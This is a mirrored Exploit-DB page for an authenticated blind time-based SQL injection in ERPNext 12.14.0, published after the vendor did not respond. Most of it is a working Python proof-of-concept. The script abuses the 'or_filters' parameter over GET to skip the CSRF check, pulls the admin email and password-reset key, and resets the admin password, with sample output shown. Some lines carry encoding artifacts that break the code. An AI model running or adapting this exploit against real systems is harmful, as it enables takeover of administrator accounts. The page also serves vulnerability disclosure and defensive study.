ERPNext 12.14.0 – SQL Injection (Authenticated)

  • 作者: Hodorsec
    日期: 2021-01-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49464/
  • # Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated)
    # Date: 21-01-21
    # Exploit Author: Hodorsec
    # Vendor Homepage: http://erpnext.org
    # Software Link: https://erpnext.org/download
    # Version: 12.14.0
    # Tested on: Ubuntu 18.04
    
    #!/usr/bin/python3
    
    # AUTHENTICATED SQL INJECTION VULNERABILITY
    # In short:
    # Found an authenticated SQL injection when authenticated as a low-privileged user as the parameters "or_filter" and "filters" are not being sanitized sufficiently. Although several sanitation and blacklist attempts are used in the code for other parameters, these parameters aren't checked. This allows, for example, a retrieval of the admin reset token and reset the admin account using a new password as being shown in the PoC.
    #
    # Longer story:
    # Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to successfully exploit a blind time-based SQL injection using an array/list as parameter using '["{QUERY}"]', where {QUERY} is any unfiltered SQL query.
    # The "or_filters" parameter is used as part of the SELECT query, along with parameters "fields", "order_by", "group_by" and "limit". When entering any subselect in the "or_filters" or "filters" parameter, no checks are being made if any blacklisted word is being used.
    # Initially, the requests where performed using the HTTP POST method which checks for a CSRF token. However, converting the request to an HTTP GET method, the CSRF token isn't required nor checked.
    # Test environment:
    # Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0.
    # Cause:
    # In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently.
    
    # STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY
    # 1. Create account
    # 1.a. Use update-password link for created user received via mail
    # STEPS INCLUDED IN SCRIPT
    # 1. Login using existing low-privileged account
    # 2. Use SQL Injection vulnerability in "frappe/frappe/nodel/db_query/get_list" function by not sanitizing parameters "filters" and "or_filters" sufficiently
    # 3. Retrieve reset key for admin user
    # 4. Reset admin account using given password
    
    # DEMONSTRATION
    # $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py hodorhodor@nowhere.local passpass1234@ admin password123411111 http://192.168.252.8/ 2
    # [*] Got an authenticated session, continue to perform SQL injection...
    # [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table...
    # admin@nowhere.local
    # [*] Retrieved value 'admin@nowhere.local' for username 'admin' column 'name' in row 1
    # [*] Sent reset request for 'admin@nowhere.local
    # [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table...
    # xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX
    # [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1
    # [+] Retrieved email 'admin@nowhere.local' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX'
    # [+} RESETTED ACCOUNT 'admin@nowhere.local' WITH NEW PASSWORD 'password123=411111!
    # 
    # [+] Done!
    
    import requests
    import urllib3
    import os
    import sys
    import re
    
    # Optionally, use a proxy
    # proxy = "http://<user>:<pass>@<proxy>:<port>"
    proxy = ""
    os.environ['http_proxy'] = proxy
    os.environ['HTTP_PROXY'] = proxy
    os.environ['https_proxy'] = proxy
    os.environ['HTTPS_PROXY'] = proxy
    
    # Disable cert warnings
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    # Set timeout
    timeout = 30
    
    # Injection prefix and suffix
    inj_prefix = "[\"select(sleep("
    inj_suffix = "))))\"]"
    
    # Decimal begin and end
    dec_begin = 48
    dec_end = 57
    
    # ASCII char begin and end
    ascii_begin = 32
    ascii_end = 126
    
    # Handle CTRL-C
    def keyboard_interrupt():
    """Handles keyboardinterrupt exceptions"""
    print("\n\n[*] User requested an interrupt, exiting...")
    exit(0)
    
    # Custom headers
    def http_headers():
    headers = {
    'User-Agent': "Mozilla",
    }
    return headers
    
    # Get an authenticated session
    
    def get_session(url,headers,email,password):
    data = {'cmd':'login',
    'usr':email,
    'pwd':password,
    'device':'desktop'}
    session = requests.session()
    r = session.post(url,headers=headers,data=data,timeout=timeout,=
    allow_redirects=True,verify=False)
    if "full_name" in r.text:
    return session
    else:
    print("[!] Unable to get an authenticated session, check credentials...")
    exit(-1)
    
    # Perform the SQLi call for injection
    def sqli(url,session,headers,inj_str,sleep):
    comment_inj_str = re.sub(" ","+",inj_str)
    inj_params = {'cmd':'frappe.model.db_query.get_list',
    'filters':'["idx=1"]',
    'or_filters':inj_str,
    'fields':'idx',
    'doctype':'Report',
    'order_by':'idx',
    'group_by':'idx'}
    
    # inj_params[param] = comment_inj_str
    inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_para=
    ms.items())
     =20
    # Do GET
    r = session.get(url,params=inj_params,headers=headers,timeout=t=
    imeout,verify=False)
    res = r.elapsed.total_seconds()
    if res >= sleep:
    return True
    elif res < sleep:
    return False
    else:
    print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
    exit(-1)
    
    # Loop through positions and characters
    def get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep):
    extracted = ""
    max_pos_len = 35
    # Loop through length of string
    # Not very efficient, should use a guessing algorithm
    for pos in range(1,max_pos_len):
    # Test if current pos does have any valid value. If not, break
    direction = ">"
    inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" =
    + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + suffix
    if not sqli(url,session,headers,inj_str,sleep):
    break
    # Loop through ASCII printable characters
    direction = "="
    for guess in range(ascii_begin,ascii_end+1):
    extracted_char = chr(guess)
    inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + suffix
    if sqli(url,session,headers,inj_str,sleep):
    extracted += chr(guess)
    print(extracted_char,end='',flush=True)
    break
    return extracted
    
    
    def forgot_password(url,headers,sqli_email):
    data = {'cmd':'frappe.core.doctype.user.user.reset_password',
    'user':sqli_email}
    r = requests.post(url,headers=headers,data=data,verify=False,al=
    low_redirects=False,timeout=timeout)
    if "Password reset instructions have been sent to your email" in r.text=
    :
    return r
    
    def reset_account(url,headers,sqli_email,sqli_reset_key,new_password):
    data = {'key':sqli_reset_key,
    'old_password':'',
    'new_password':new_password,
    'logout_all_sessions':'0',
    'cmd':'frappe.core.doctype.user.user.update_password'}
    r = requests.post(url,headers=headers,data=data,verify=False,al=
    low_redirects=False,timeout=timeout)
    if r.status_code == 200:
    return r
    
    # Main
    def main(argv):
    if len(sys.argv) == 7:
    email = sys.argv[1]
    password = sys.argv[2]
    username = sys.argv[3]
    new_password = sys.argv[4]
    url = sys.argv[5]
    sleep = int(sys.argv[6])
    else:
    print("[*] Usage: " + sys.argv[0] + " <email_login> <passw_login> <username_to_reset> <new_password> <url> <sleep_in_seconds>")
    print("[*] Example: " + sys.argv[0] + " hodorhodor@nowhere.local passpass1234@ admin password1234@ http://192.168.252.8/ 2\n")
    exit(0)
    
    # Random headers
    headers = http_headers()
    
    # Sleep divide by 2 due to timing caused by specific DBMS query
    sleep = sleep / 2
    
    # Optional prefix / suffix
    prefix = ""
    suffix = ""
    
    # Tables / columns / values
    table = 'tabUser'
    columns = ['name','reset_password_key']
    sqli_email = ""
    sqli_reset_key = ""
    
    # Rows
    rows = 1
    
    # Do stuff
    try:
    # Get an authenticated session
    session = get_session(url,headers,email,password)
    if session:
    print("[*] Got an authenticated session, continue to perform SQL injection...")
     =20
    # Getting values for found rows in specified columns
    for column in columns:
    print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...")
    for row in range(0,rows):
    retrieved = get_data(url,session,headers,prefix,suffix,ro=
    w,column,table,username,sleep)
    print("\n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1))
    if column == 'name':
    sqli_email = retrieved
    # Generate a reset token in database
    if forgot_password(url,headers,sqli_email):
    print("[*] Sent reset request for '" + sqli_email + "'"=
    )
    else:
    print("[!] Something went wrong sending a reset request, check requests or listening mail server...")
    exit(-1)
    elif column == 'reset_password_key':
    sqli_reset_key = retrieved
    
    # Print retrieved values
    print("[+] Retrieved email '" + sqli_email + "' and reset key '" + =
    sqli_reset_key + "'")
    
    # Reset the desired account
    if reset_account(url,headers,sqli_email,sqli_reset_key,new_password=
    ):
    print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'")
    else:
    print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?")
    exit(-1)
     =20
    # Done
    print("\n[+] Done!\n")
    except requests.exceptions.Timeout:
    print("[!] Timeout error\n")
    exit(-1)
    except requests.exceptions.TooManyRedirects:
    print("[!] Too many redirects\n")
    exit(-1)
    except requests.exceptions.ConnectionError:
    print("[!] Not able to connect to URL\n")
    exit(-1)
    except requests.exceptions.RequestException as e:
    print("[!] " + str(e))
    exit(-1)
    except requests.exceptions.HTTPError as e:
    print("[!] Failed with error code - " + str(e.code) + "\n")
    exit(-1)
    except KeyboardInterrupt:
    keyboard_interrupt()
    exit(-1)
    
    # If we were called as a program, go execute the main function.
    if __name__ == "__main__":
    main(sys.argv[1:])
     
    # Timeline:
    # 22-12-20: Sent initial description and PoC via https://erpnext.com/security
    # 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications.
    # 21-01-21: No response received, public disclosure